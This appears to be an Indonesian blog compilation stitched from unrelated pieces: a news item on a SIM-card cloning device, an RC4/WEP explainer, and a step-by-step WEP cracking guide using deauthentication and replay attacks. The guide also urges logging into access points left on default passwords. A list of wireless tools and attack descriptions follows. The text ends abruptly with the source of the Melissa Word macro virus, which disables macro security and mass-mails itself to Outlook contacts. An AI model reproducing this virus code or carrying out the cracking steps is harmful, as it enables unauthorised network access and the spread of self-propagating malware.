KEMAJUAN teknologi komunikasi dalam penggunaan ponsel berbasis GSM sekarang ini sudah mencapai jumlah yang sangat signifikan dan mulai menimbulkan persoalan-persoalan baru yang tidak pernah ditemui sebelumnya. Persoalan yang muncul sebenarnya bukan pada peralatan ponsel yang sangat masif di pasaran dari berbagai model, tetapi lebih pada persoalan-persoalan yang menyangkut persoalan harga, kekuatan sinyal, serta fasilitas layanan yang disediakan oleh para operator GSM.
HARGA memang selalu menjadi persoalan utama para pengguna ponsel GSM di mana saja, termasuk di Indonesia. Ini terlihat dari banyaknya jumlah pengguna GSM yang memilih skema pembayaran pre-paid dengan memilih SIM Card isi ulang yang sangat populer. Lebih dari 80 persen SIM Card di berbagai operator GSM di Indonesia adalah para pelanggan yang membayar di muka dengan pilihan isi pulsa yang variatif.
Banyaknya pengguna jasa GSM juga menyebabkan masalah lain, terutama berkaitan dengan kekuatan sinyal dari berbagai base station yang terasa mulai sesak dan tidak tertatanya pusat penerima sinyal GSM. Akibatnya, kita pun selalu kesal karena tidak bisa memperoleh sinyal di kawasan tertentu di Jakarta.
Di sisi lain, karena kemajuan teknologi perangkat ponsel sendiri, tidak semua operator GSM memiliki jasa layanan multimedia masa kini seperti GSM, MMS, dan sejenisnya. Karena persoalan ini, banyak pelanggan GSM memiliki lebih dari satu SIM Card dari beberapa operator untuk bisa menikmati berbagai jasa layanan yang tidak dimiliki oleh operator lain.
Kenyataan ini kemudian melahirkan berbagai solusi menarik, termasuk di antaranya Sim Max, sebuah perangkat untuk melakukan kloning SIM Card yang mudah digunakan. Orang biasanya merasa terkejut pada perangkat Sim Max yang mampu melakukan kloning berbagai ragam SIM Card dan memasukkannya ke dalam sebuah SIM Card lain yang memungkinkan penggunanya memiliki 12 nomor ponsel dalam sebuah SIM Card.
Proses kloning
Perangkat Sim Max ini terdiri dari sebuah perangkat berbentuk segitiga yang disambung ke komputer menggunakan saluran USB (Universal Serial Bus) yang berfungsi untuk membaca berbagai SIM Card yang dikeluarkan oleh operator GSM dan menulis seluruh informasi SIM Card milik operator ini ke sebuah SIM Card baru yang disediakan. Proses kloning SIM Card ini sendiri memang membutuhkan waktu, namun berlangsung lebih cepat dibandingkan dengan seri sebelumnya.
Sim Max sebenarnya melakukan proses menerjemahkan algoritma secara berurutan sehingga membutuhkan waktu yang cukup lama,kira-kira membutuhkan waktu sekitar 1,5-4 jam.
Perangkat Sim Max ini memiliki beberapa keuntungan tersendiri sebagai sebuah pemindai SIM Card dengan frekuensi tinggi. Sim Max ketika melakukan proses kloning SIM Card dengan frekuensi 7 MHz membutuhkan waktu paling tidak 2,5 jam. Sedangkan pada pemindai SIM Card dengan frekuensi 3,5 MHz, prosesnya menjadi semakin lama, sampai 6,5 jam.
Keuntungan lain menggunakan Sim Max adalah SIM Card yang sudah dikloning ini ketika digunakan pada ponsel GSM bisa secara bergantian digunakan tanpa harus mematikan dan menghidupkan kembali ponsel yang digunakan. Teknologi sebelumnya mengharuskan ponsel dimatikan terlebih dahulu sebelum menggunakan SIM Card yang sudah dikloning.
Keseluruhan nomor ponsel yang bisa dimuat Sim Max mencapai 12 buah nomor yang bisa dibedakan satu dengan lainnya melalui penampilan nomor yang digunakan. Kelebihan Sim Max lainnya adalah kemampuannya untuk memberikan berbagai fungsi seperti screen saver, logo, dan pemilihan nada dering (ring tone). Bahkan, Sim Max juga mampu untuk memuat 250 buah nama alamat dalam phonebook, serta menerima dan menyimpan SMS yang sekarang menjadi sarana komunikasi paling efektif dan murah.
Kemudahan komunikasi
Sim Max memiliki berbagai sisi positif dibanding kemampuannya untuk disalahgunakan, seperti pada proses kloning yang selama ini menjadi momok bagi para pengguna ponsel GSM. Selain itu, Sim Max sendiri memiliki keterbatasannya sendiri, misalnya, tidak bisa digunakan pada semua perangkat ponsel GSM yang ada. Kompas sendiri menggunakan pada perangkat Philips 9@9+++, namun pada perangkat ponsel lainnya Sim Max bisa digunakan bila sudah ditingkatkan sistem operasinya (firmware upgrade).
Keunikan Sim Max ini sebenarnya mengisyaratkan dimulainya sebuah era penggunaan komunikasi selektif. Artinya, pengguna jasa GSM sekarang ini cukup memiliki satu SIM Card saja untuk berkomunikasi suara menggunakan jasa operator tertentu yang murah dan menggunakan komunikasi SMS untuk komunikasi lainnya.
Atau, perangkat Sim Max ini juga akan sangat bermanfaat bagi mereka yang memiliki dan menggunakan jasa operator GSM luar negeri, sehingga ketika berada di luar negeri cukup memindahkan nomor ponsel di dalam Sim Max untuk menggunakan jasa operator GSM di negara tujuan. Memudahkan dan tidak berisiko kehilangan SIM Card karena lupa menyimpan di mana.
Sim Max sendiri di satu sisi menunjukkan di mulainya sebuah komunikasi alternatif bagi para pengguna ponsel GSM. Memiliki berbagai SIM Card dari berbagai operator, karena berbeda jasa layanan dan kualitas serta kemudahan kepemilikan sistem pre-paid, sering kali merepotkan dan tidak nyaman. Memiliki beberapa nomor telepon dan jasa layanan GSM di Sim Max akan membawa kita ke sebuah pengalaman bertelekomunikasi yang berbeda sama sekali.
WEP adalah Wired Equivalent Privacy. Ini merupakan standar untuk enkripsi nirkabel sampai sekarang. Banyak orang bahkan tidak menggunakan WEP karena keamanan yang lemah, repot, atau WEP sangat pointless, karena bisa dicrack, walaupun biasanya memakan waktu cukup lama untuk memperoleh cukup data untuk mendapatkan password WEP, terutama password yang sangat panjang.
WEP terdiri dari password rahasia dan enkripsi. Password rahasia yang digunakan bersama antara akses point dan semua orang di jaringan nirkabel, terdiri dari 5 atau 13 karakter. Digunakan oleh proses enkripsi untuk komunikasi paket yang disamarkan sepanjang WLAN, atau Wireless Local Area Network. Semua paket yang unik dan acak, jadi jika seseorang melakukan crack pada satu paket key, mereka tidak dapat melihat apa yang dilakukan orang lain tanpa melakukan cracking pada mereka juga.
Ini semua dilakukan dengan menggunakan password rahasia bersamaan dengan tiga karakter (the Initialization Vector, atau IV) yang dipilih secara acak oleh perangkat nirkabel. Misalnya, jika Anda adalah password “hello”, mungkin membuat “abchello” untuk satu paket, dan “xyzhello” untuk lainnya.
WEP juga menggunakan XOR, atau Eksklusif ATAU, untuk enkripsi. XOR membandingkan dua bit, dan jika theyre berbeda, ia akan mengembalikan 1. Jika tidak, ia akan mengembalikan 0. Misalnya, 1 XOR 1 akan 0, dan 1 XOR 0 akan 1.
Array adalah variabel yang dapat menyimpan beberapa nilai. Misalnya, array abjad [26] akan terus nilai 26, yang diberi label 0 melalui 25.
Contoh:
alphabet[0] = ‘A’;
alphabet[1] = ‘B’;
void swap(char &first, char &second)
{
char temp = first;
first = second;
second = temp;
}
swap(alphabet[0], alphabet[1]);
Jika nilai-nilai array swapped randomely telah berkali-kali, maka tidak mungkin dikirim ke array elemen yang memegang nilai.
Algoritma yang sebenarnya digunakan oleh WEP untuk mengenkripsi paket yang adalah RC4. RC4 terdiri dari dua langkah: dengan password dan Penjadwalan Algoritma Pseudo Random Generasi Algoritma. Bagian pertama, yang Penjadwalan Algoritma password, atau KSA, seperti ini dalam kode C, assuming k [] adalah array dari password rahasia:
int n = 256;
char s[n];
// initialization
for (int i = 0; i <= (n – 1); i++)
s[i] = i;
int j = 0;
// scrambling
for (int l = 0; l <= (n – 1); l++)
{
j += s[l] + k[l];
swap(s[l], s[j]);
}
Mari kita telaah kode di atas hingga kita tahu bahwa:
1. Integer ‘n’ menentukan seberapa kuay enkripsi yang kita buat. WEP disini menggunakan 256.
2. Array karakter ‘k’ adalah password rahasia yang dikombinasikan dengan tiga karakter palsu. Hal ini tidak berubah sama sekali dalam program ini.
3. Tanda ’//Inisialisasi’ hanya merupakan inisialisasi, sebanyak karakter 0-255.
4. Integer ‘j’ digunakan untuk memegang nilai selama scrambling. Selalu diinisialisasi ke 0, karena harus selalu di mulai 0.
5. Selanjutnya, (di mana ‘/ / scrambling’) scrambling proses dimulai. Pada dasarnya akan menghasilkan ’s’ array “acak” dari sebelumnya ‘ s’ array yang ditentukan.
6. Di dalam lingkaran, yang pertama mereka merges password (k) dengan acak array (s) untuk membuat sebuah karakter selesai. Lalu, panggilan untuk swap () menempatkan ke dalam array dari karakter selesai.
Sekarang saatnya untuk bagian kedua dari algoritma RC4, maka Algoritma Pseudo Random Generation (PRGA). Bagian ini output streaming password berdasarkan KSA’s pseudo-acak array. Streaming key ini akan digabung dengan data cleartext untuk menciptakan data yang dienkripsi.
int i = 0;
int j = 0;
int z;
while (data_disini)
{
i++;
j += s[i];
swap(s[i], s[j]);
z = s[s[i] + s[j]];
// z is outputted here
// and then XOR’d with cleartext
}
1. Integers’ i ‘dan’ j ‘telah dideklarasikan dan diinisialisasi ke 0.
2. Terdapat satu lingkaran yang berjalan sampai akhir paket data tersebut tercapai.
3. ‘I’ adalah incremented dalam setiap perulangan dari lingkaran itu agar tetap berjalan.
4. ‘J’ memegang pseudo-nomor acak.
5. Pemanggil lain untuk swap () karakter yang aktif dalam s [i], dan s [j].
6. ‘Z’ dihitung dengan menambahkan s [i], dan s [j] dan mengambil nilai dalam elemen sesuai jumlah mereka. Alasan ini akan dijelaskan nanti.
7. ‘Z’ adalah XOR’d dengan cleartext untuk membuat teks baru dienkripsi.
Berhubung dgn putaran CRC stands for redundancy checksum. Ketika paket-paket yang dikirim ke seluruh jaringan, harus ada cara untuk mengetahui host menerima paket belum rusak dengan cara apapun. Ini adalah tujuan dari CRC. Sebelum data dikirim, CRC menghitung nilai, atau checksum, untuk paket yang akan dikirim dengan paket. Bila diterima, target host menghitung baru dari checksum menggunakan CRC. CRCs Jika cocok, maka paket dari kredibilitas telah dikonfirmasi.
Ringkasnya. Access Point menciptakan pseudo-acak karakter. Mereka bergabung dengan berbagi prechosen password untuk membuat password rahasia. KSA kemudian menggunakan password ini untuk membuat pseudo-acak array, yang digunakan oleh PRGA streaming untuk membuat key. Password ini kemudian di XOR dengan cleartext untuk menciptakan data dienkripsi, dan masuk ke dalam CRC dan membuat checksumnya.
Kemudian, untuk penerimaan host decrypts. Karakter ditambahkan oleh AP yang akan dihapus dan digabung dengan key untuk dikirim kembali bersama dengan password rahasia. Password masuk melalui seluruh proses RC4, dan XOR’d dengan teks terenkripsi, dan menciptakan cleartext checksum. Checksum akan dihapus dan dibuat yang kemudian dibandingkan untuk melihat apakah data selamat, dan apakah ini merupakan pengguna asli.
Bagian II: Cracking WEP
Sebelum kita masuk cracking WEP, mari kita bahas beberapa flaws dalam proses enkripsi:
* Ada 5% kesempatan bahwa nilai dalam s [0]-s [3] tidak akan berubah setelah tiga Iterasi oleh KSA.
* Yang pertama nilai dalam data dienkripsi adalah SNAP, yang 0xAA, atau 170 basis 10. Sniffing pertama dari byte dan teks terenkripsi XOR-ing dengan 170 akan memberikan output byte pertama dari PRGA.
* J format tertentu yang byte yang diberikan oleh AP akan menunjukkan bahwa ia adalah lemah dan mudah untuk di crack. Format ini (B + 3, 255, X), dimana B adalah byte dari password rahasia. Dimana X dapat bernilai apapun.
Kita akan berbicara tentang KSA sekarang. Mari kita menetapkan beberapa variabel untuk “pengujian”:
* Karakter kode yang diambil dari AP adalah 3255,7. Kami sniffed itu dari udara. Kami akan menggunakannya karena hasil tes telah menunjukkan itu adalah kode yang sangat lemah.
* Shared passwordnya adalah 22222. Dalam prakteknya, Anda tidak akan tahu ini.
* N adalah 256.
* Jika ada nilai di atas 256, modulo operasi akan digelar di atasnya. Nilai yang dihasilkan itulah yang akan digunakan.
* Array ’s’ telah dipastikan, dengan nilai 0-255.
Buka program Kismet. Kismet adalah scanner nirkabel bebas untuk Linux. Bila Anda membukanya, Anda akan melihat daftar WLAN yang berada dalam jangkauan. Pilih salah satu dan buat catatan dari keempat rincian berikut ini (perlu diketahui bahwa target komputer didapat dari setiap host pada WLAN):
* AP MAC Address
* MAC Address komputer target.
* WEP – Key digunakan
* Wi-Fi- saluran yang digunakan
Buka Aircrack dan anda akan mulai menangkap paket-paket. Anda juga akan menangkap IVs. Tapi ini memakan waktu lama. Ia bahkan dapat berlangsung selama beberapa jam atau hari untuk menangkap jumlah IVs ke crack password WEP.
Untungnya, kami dapat mempercepatnya. Misalnya, jika WLAN sangat sibuk, maka akan lebih banyak lalu lintas paket IVs, sehingga IVs lebih mudah diambil. Jika kami terus ping ke jaringan, akan menghasilkan lebih banyak paket data.
ping-t-l 50000 ip_address
Jadi apa yang harus dilakukan sekarang? Kami memiliki sedikit data, tetapi kita harus mendapatkan password WEP di sini. Ada waktu untuk meloloskan void11. Void11 yang di deauthenticate AP ke semua host yang ada disana. Cutting off dilakukan hingga ke seluruh host. Hal pertama yang dilakukan dalam hal ini adalah automaticall yang akan mencoba untuk menyambung kembali koneksi ke AP.
Namun ada teknik lain yang disebut replay attack. Ini menangkap sebuah paket dari sebuah host pada WLAN, kemudian melakukan spoofs host dan terus mengulang paket berulang ulang. Menghasilkan lalu lintas paket data yang sangat besar. Yang terbaik dari program ini adalah airreplay. Ini adalah untuk apa void11 digunakan.
Buka airodump. Sekarang, ucapkan terima kasih kepada Replay Attack. IV berjalan sekitar 200 per detik. Wow! Anda mungkin akan mendapatkan semua paket yang diperlukan dalam waktu 10 menit. Semua IVs sedang ditulis ke dalam file yang akan diambil. Kemudian buka aircrack. Aircrack akan membaca semua IVs yang di ambil dari file, dan melakukan analisis statistik pada file tsb. Lalu, ia akan berusaha untuk brute force file” yang ada. Setelah menemukan passwordnya, password itu akan diberikan pada anda.
Hehehe.. Finally: Kamu sudah mendapatkan passwordnya
Software ini lebih ungul dibanding software wireless client punyaan windows. Software ini akan memberikan informasi tentang Channel, MAC Address, SSID, Speed, Vendor, Type, Encryption, SNR, Signal+, Noise- dari jaringan wireless yang dapat kita tangkap. Tapi untuk enkripsi, netstumbler masih belum bisa membedakan antara WEP, WPA, WPA2 (semua dianggap WEP). Untuk kualitas sinyal selain ditampilkan secara angka, kita juga bisa melihat secara grafik. Dari informasi ini kita dapat mengetahui apakah ada sinyal yang dapat ditangkap tanpa enkripsi….. jika ada silahkan connect, siapa tahu itu akses internet. Jika tidak ada……. Jika sinyal kurang kuat……
AP Default Password
Ini adalah suatu kesalahan yang sering aku jumpai. Para admin biasanya
“malas” untuk merubah username, password, ip default dari AP yang dia gunakan. misalnya di daerahku AP untuk jarak jauh yang paling banyak digunakan adalah merk senao dengan username “admin”, password [kosong] , Default IP: 192.168.-.-. Inilah yang menyebabkan kita dapat melakukan “oprek” Access Point secara web browser.
Penguatan sinyal
Ada berbagai cara untuk menguatkan sinyal wifi kita. Tapi menurutku yang
paling simple yaitu menggunakan USB Wifi. Dengan USB Wifi ini kita dapat memperpanjang kabel dengan menggunakan kabel UTP/ LAN kualitas bagus yang dimodifikasi menjadi kabel USB. Selain itu kita tidak membutuhkan sumber daya lagi, karena sudah tersuplly oleh kabel USB ini. Selajutnya kita naikkan USB Wifi kita sebagai antena. Jika masih kurang kuat ada beberapa cara modif dengan teknik parabolic (wajanbolik), atau penggantian antena USB Wifi itu sendiri, terutama yang ada antena eksternalnya.
Injeksi Paket
Bagian inilah yang kita laksanakan jika tidak ada yang memakai AP Default Password. Ini merupakan hal yang paling sulit, terutama untuk pencarian chipset yang digunakan wifi yang bisa digunakan untuk injeksi paket di pasaran. Dalam hal ini chipset yang paling terkenal yaitu “ATHEROS”. Tapi tidak semua chipset atheros mendukung injeksi paket, soalnya kita harus mengganti driver bawaanya dengan driver yang support injeksi paket, tidak hanya monitoring. Wildpackets dan Tamos adalah perusahaan yang membuat driver untuk wifi adapter kita supaya bisa injeksi paket yaitu airopeek dan CommView. Contoh chipset atheros yang cocok untuk ini yaitu AR5000 Series (misalnya : D-Link AirPro DWL-A650 Wireless Cardbus Adapter, Intel(R) PRO/Wireless 5000 LAN Cardbus Adapter, Intel(R) PRO/Wireless 5000 LAN 3A Mini PCI Adapter, LinkSys Instant Wireless PC Card (WPC54A), NetGear HA501 Wireless Adapter, Proxim Harmony 802.11a Network Adapter (Model 8450), Proxim Skyline 802.11a, Network Adapter (Model 4030), SMC EZ Connect 802.11a Wireless Cardbus Adapter (2735W), Sony 802.11a Wireless LAN Adapter (PCWA-C500)).
Berikut adalah beberapa software yang dapat Anda gunakan untuk hacking Wireless, namun disini tidak dibahas mengenai tutorial dan juga tidak menyediakan link download. Jadi silakan cari sendiri melalui google.
agnet Laptop Analyzer 6
AirMagnet Laptop Analyzer adalah aplikasi yang menawarkan sistem keamanan wireless bagi laptop. Aplikasi ini mampu mendeteksi lebih dari 130 masalah jaringan wireless.
AiroPeekNX 301
AiroPeekNX aplikasi yang berfungsi untuk menganalisa jaringan wireless. Analisa jaringan dapat dilakukan sampai analisa protocol dan juga secara remote. AiroPeekNX medukung hampir semua kebutuhan mengelola jaringan wireless.
Airscanner Mobile AntiVirus Pro
Semakin berkembangnya jaringan wireless pada PDA maupun Smartphones maka peningkatan serangan dari pihak luar dengan memanfaatkan virus akan semakin besar oleh karena itu Mobile AntiVirus Pro menawarkan aplikasi yang membuat anda terhindar dari sebagian besar serangan virus tersebut.
AirscannerMobile Encrypter
Airscanner Mobile Encrypter memberikan kamu kendali terhadap enkripsi/dekripsi pada dokumen-dokumen yang penting yang ada dalam Pocket PC. Tiap file dapat menggunakan password tersendiri dalam enkripsinya.
AirscannerMobile Firewall
Airscanner Movile Firewall menawarkan sistem keamanan buat PocketPC dalam penyaringan paket-paket data yang diterima melalui suatu jaringa. Selain itu juga untuk mencegah akses yang berbahaya. Aplikasi ini memungkinkan Anda menentukan penyaringan terhadap paket-paket data tersebut dengan terlebih dahulu mendefenisikannya.
Asleap [Cygwin]
Tool ini berfungsi untuk recovery password pada sistem pengamanan jaringan LEAP/PPTP.
Boingo Wireless 1.4 build 1195
Dengan boingo Anda hanya butuh satu password dan username untuk masuk ke berbagai jaringan wireless yang ada. Boingo mendukung login mencapai 17000 hotspot.
BVRP Connection Manager Pro 1.03
BVRP Connection Manager Pro adalah aplikasi yang akan membantu Anda untuk berpindah dari suatu jaringan ke jaringan lainnya dengan mudah. Selain itu aplikasi ini mampu menampilkan informasi jaringan tersebut.
DMZS Carte 0.9.rc1
DMZS-carte adalah aplikasi yang dikembangkan dengan pemrograman perl, yang membutuhkan input berupa teks dari netstumbler dan menghasilkan gambar peta.
Colligo Workgroup Edition 3.2
Colligo Workgroup Edition adalah aplikasi yang bisa digunakan untuk koneksi terhadap berbagai jaringan yang ada dalam jangkauan.Setelah koneksi pada jaringan tersebut maka Anda akan dengan mudah dapat membagi dokumen-dokumen tertentu dalam jaringan tersebut. Selain itu juga bisa membagi koneksi internet, printer, informasi jadwal di outlook.
CommView for WiFi 5.2 build 480
CommView for WiFi adalah aplikasi yang berfungsi untuk menganalisa dan memantau jaringan wireless. Aplikasi ini mampu menampilkan informasi secara grafis yang akurat, selain itu juga mendukung labih dari 70 protokol yang dapat dianalisa.
Easy WiFi Radar 1
Easy Wi-Fi Radar merupakan tool yang dapat membantu Anda menemukan jaringan wireless yang tersedia disekitar Anda. Lalu Anda bisa dengan mudah terkoneksi kejaringan tersebut, asalkan jaringan tersedia untuk umum.
EggKey Gateway 1.0.66
Eggkey Gateway adalah aplikasi yang dibuat khusus untuk mengendalikan pengguna access point wireless. EggKey Gateway menyediakan autentifikasi berbasis web, sehingga pengguna dapat menggunakan layanan internet yang disediakan.
LinkFerret Network Monitor
LinkFerret adalah aplikasi pemantau jaringan yang lengkap berbasis windows. Sebagai aplikasi pemantau jaringan LinkFerret termasuk aplikasi yang dapat diandalkan dan tersedia dengan harga yang cukup terjangkau.
GoToMyPC 4.1
GoToMyPC dengan aplikasi ini maka kendali jarak jauh terhadap PC Anda yang terkoneksi dengan internet atau jaringan wireless dapat dilakukan dimana saja. Berbagai kegiatan tersebut seperti mengakses file, menggunakan program, periksa email dan masih banyak lagi. Anda akan serasa duduk didepan PC tersebut.
Highwall Personal Wireless Security version 2.0
Highwall Personal Wireless Security dapat menjadi solusi bagi Anda yang membutuhkan keamanan saat menggunakan jaringan wireless.
JiWire Hotspot Locator 2
JiWire Hotspot Locator ini digunakan secara offline. Aplikasi ini mampu memberikan informasi lokasi access point yang ada diseluruh dunia. Didalamnya juga terdapat beberapa access point di Indonesia.
Hotspotter
Hotspotter berfungsi untuk mengenal pengakses jaringan yang ada dalam jaringan wireless lalu membandingkan identifikasi pengakses dengan daftar pengguna yang tercatat. Apabila identifikasi pendaftar ada pada daftar tersebut maka pengakses diperbolehkan pengguna jaringan. Aplikasi ini mampu menggunakan menjalankan program untuk menolak akses dari pengguna tak dikenal.
I’m InTouch 5.0
I`m InTouch adalah aplikasi yang berfungsi melayani pengaksesan PC dari jarak jauh. Caranya dengan install terlebih dahulu aplikasi tersebut pada PC Anda, setelah itu Anda bisa mengaskes secara aman PC Anda dimana saja. Berbagai kegiatan dapat dilakukan layaknya didepan PC tersebut. Disini hanya tersedia seeder-nya saja. Untuk menginstalasi aplikasi ini Anda butuh koneksi Internet agar dapat mendownload keseluruhan aplikasi yang dibutuhkan.
12Planet Instant Messaging Server 2.6
Aplikasi ini mampu membuat sebuah server untuk saling mengirim pesan singkat. Kelebihan dari aplikasi ini adalah memungkinkan tidak diperlukannya instalasi pada client. Karena aplikasi ini mampu berintegrasi dengan protokol Microsoft Messenger Instant Messaging
iPIG WiFi Hotspot VPN Security
iPIG WiFi Hotspot VPN Security adalah aplikasi yang berfungsi menjaga keamanan transfer data khususnya pada jaringan wireless.
Microsoft VirtualWiFi
VirtualWiFi adalah aplikasi yang memungkinkan penggunaan berbagai jenis jaringan wireless hanya dengan sebuah Wi-Fi card.
MiniStumbler 0.4.0
Tool gratisan ini berfungsi untuk mengetahui keadaan jaringan wireless sekitar Anda berbagai informasi secara table maupun grafis. Tool ini berjalan pada hampir seluruh Pocket PC.
NetStumbler 0.4.0
Tool gratisan ini berfungsi untuk mengetahui keadaan jaringan wireless sekitar Anda berbagai informasi secara table maupun grafis.
Network Magic 2
Network Magic adalah solusi bagi pengelolaan jaringan wireless. Membagi dokumen dan penggunaan printer dalam suatu jaringan wireless akan lebih mudah. Selain itu juga aplikasi ini dapat mendeteksi penyusup yang masuk dalam jaringan wireless yang Anda kelola.
Packetyzer
Packetyzer menampilkan tampilan menyerupai windows dan memiliki hampir semua kemampuan Ethereal. Aplikasi ini mampu menangkap paket data dan menganalisa hampir semua analisa protokol.
PCTEL Wi-Fi Roaming Client 3.100.90.1
PCTEL Roaming Client adalah tool untuk mengelola akses WiFi(802.11) jaringan. APlikasi ini mampu mendeteksi secara otomatis jaringan WiFi dan menyimpan konfigurasi jaringan.
PortMapper 1.0
PortMapper adalah aplikasi yang berfungsi untuk mengatur penggunaan port. Khususnya bagi para gamer yang sering bermain game online. Manfaat dari pengaturan port ialah dapat terhindar dari pengaksesan dari pihak luar melalui port-port yang terbuka itu.
PTS TracerPlus Wireless Server 2.1.0.59
TracerPlus Wireless Server memungkinkan perusahaan membuat sebuah server jaringan wireless yang tersedia dalam harga yang lebih terjangkau. Aplikasi ini dapat melakukan koneksi dengan database yang ada di sever dengan koneksi ODBC.
Radiuz Wizard 1.0
Radiuz dapat membuat sebuah sistem keamanan jaringan wireless yang fleksibel. Aplikasi ini menggunakan standar keamanan WPA. Pengguna dapat mengendalikan akses kendali dari luar. Radiuz Wizard secara otomatis berintegrasi dengan Windows XP dalam pengelolaan jaringan wireless.
Retina WiFi Scanner
Retina WiFi Scanner adalah aplikasi pendeteksi bentuk-bentuk tindakan penyerangan dan juga menemukan celah-celah keamanan yang akan merugikan.
SpotLock 1.6.134
SpotLock adalah aplikasi yang berfungsi untuk keamanan jaringan data sehingga terbebas dari hacker maupun sniffer. Selain itu aplikasi ini juga bisa berfungsi sebagai hotspot locator.
Weplab
weplab adalah tool yang berfungsi untuk memantau keamanan jaringan pada enkripsi WEP yang ada dalam jaringan wireless. Aplikasi ini juga menyediakan berbagai fitur serangan sehingga dapat memperkirakan syarat minimum dalam membobol keamanan dari jaringan tersebut.
WIFI Internet Access Blocker version 2.0.2
WiFi Internet Access Blocker adalah aplikasi yang berfungsi untuk menjaga jaringan wireless Anda yang terkoneksi ke Internet agar tidak disusup oleh orang lain yang ingin menggunakan internet tanpa seijin Anda.
ManageEngine WiFi Manager 4.0
WiFi Manager adalah aplikasi untuk mengelola koneksi jaringan wireless 802.11a/b/g. Aplikasi ini menawarkan tampilan berbasis web. Dengan begitu pengelolaan koneksi wireless keseluruhan jaringan dapat dengan mudah dilakukan.
WirelessMon v1.0 1000
WirelessMon adalah aplikasi yang berfungsi untuk memantau keadaan jaringan wireless yanga ada disekitar area Anda. Selain itu beberapa informasi mengenai jaringan wireless tersebut juga dapat diketahui.
SingleClick Wireless Security 2.0
Tool ini akan membantu anda dalam menjaga keseluruhan sistem keamanan jaringan wireless. Anda dapat dengan mudah mengkonfigurasi router ataupun berbagai alat pengelola jaringan lainnya.
Wi-Fi Defense
Wi-Fi Defense adalah aplikasi yang beroperasi dibalik layar, dan akan memberikan pemberitahuan apabila ada hardware yang akan masuk kedalam jaringan wireless tersebut. Pemberitahuan tersebut tersedia dalam icon dan popup window.
Zonerider Gateway 2.0
Zonerider adalah aplikasi yang memperbolehkan pembagian akses jaringan wireless kepada orang lain. Istilahnya PC kita dapat sebagai hotspot jaringan. Apabila PC kita terdapat akses internet maka mereka yang tergabung dalam jaringan tersebut akan dapat menikmati koneksi internet tersebut.
Packet yang merupakan data seperti Akses HTTP, Email dll, yang melewati transmisi wireless gelombang dapat dengan mudah juga ditangkap dan dianalisa oleh attacker dengan menggunakan aplikasi “Packet Sniffer”
Deniel Of service attack
Inilah serangan yang paling ditakutkan oleh para Admin. Denial Of service memang relatif sulit untuk dicegah. Serangan ini dapat menimbulkan downtime pada jaringan. Tool gratisan seperti Wireless LANJack dan hunter_killer mampu melakukan serangan ini. Serangan ini bisa saja diarahkan pada user biasa agar user tersebut tidak bisa terkoneksi dengan suatu access point. Tujuannya tak lain adalah supaya tidak ada pengguna yang bisa menggunakan layanan jaringan Karena adanya kekacauan lalulintas data (penolakan layanan). Serangan jenis ini yaitu dengan membanjiri/flooding yang mengakibatkan sinyal wireless berbenturan dan menghasilkan packet-packet yang rusak. Seorang penyusup bisa saja mengelabui Extensible Authentication Protocol (EAP) untuk melakukan serangan DoS terhadap suatu server. Aksi ini dibarengi dengan melakukan flooding data. Dengan demikian maka tidak ada satu pun user yang bisa melakukan koneksi dengan layanan jaringan.
Man in the middle attack
“Man-in-the-middle”. Sebenarnya ini adalah sebutan bagi sang penyusup. Serangan Man-in-the-Middle dilakukan dengan mengelabui koneksi VPN antara komputer pengguna resmi dan access point dengan cara memasukkan komputer lain di antara keduanya sebagai pancingan. Jenis serangan ini hampir sama dengan jenis serangan pada jaringan kabel. Program yang digunakan juga sama, kecuali perangkat wirelessnya. Dengan menggunakan sebuah program, penyusup mampu memosisikan diri di antara lalu lintas komunikasi data dalam jaringan nirkabel. Serangan seperti ini mudah dilakukan dengan bantuan software yang tepat, misalnya saja Wireless LANJack atau AirJack. Akan tetapi serangan jenis ini juga relatif mudah dicegah dengan IDS yang handal yang mampu memonitoring 24 jam sehari.
Rogue/Unauthorized Access Point
Rogue AP ini merupakan ancaman karena adanya AP liar yang dipasang oleh orang yang ingin Menyebarkan/memancarkan lagi tranmisi wireless dengan cara illegal/tanpa izin, yang menyebabkan penyerang dapat menyusup di jaringan melalui AP rogue ini.
Access Point yang dikonfigurasi tidak benar
Hal ini sangat banyak terjadi karena kurangnya pemahaman dalam mengkonfigurasi system keamanan AP.
Network Injection
Apabila sebuah access point terhubung dengan jaringan yang tidak terfilter secara baik, maka penyusup berpotensi untuk melakukan aksi boardcast – seperti spanning tree (802.1D), OSPF, RIP, dan HSRP. Dalam kondisi ini, maka semua perangkat jaringan akan sibuk dan tidak mampu lagi bekerja sebagaimana mestinya. Routing attack juga termasuk dalam serangan jenis ini. Sang penyusup bisa melakukan hal ini dengan mudah menggunakan program seperti IRPAS, yang dipergunakan untuk melakukan injeksi data pada update routing di jaringan, mengubah gateway, atau menghapus table routing yang ada.
Kegiatan yang mengancam keamanan jaringan wireless tersebut di atas dilakukan dengan cara-cara yang dikenal dengan nama Warchalking, WarDriving, WarFlying, WarSpamming, WarSpying dll. Banyaknya Access Point/Base Station yang dibangun yang seiring dengan mulai murahnya biaya berlangganan koneksi internet maka kegiatan-kegiatan hacking ytersebut di atas, biasa diterapkan untuk mendapatkan akses internet secara illegal yang tentunya tanpa perlu membayar alias gratis.
Private Sub AutoOpen()
On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
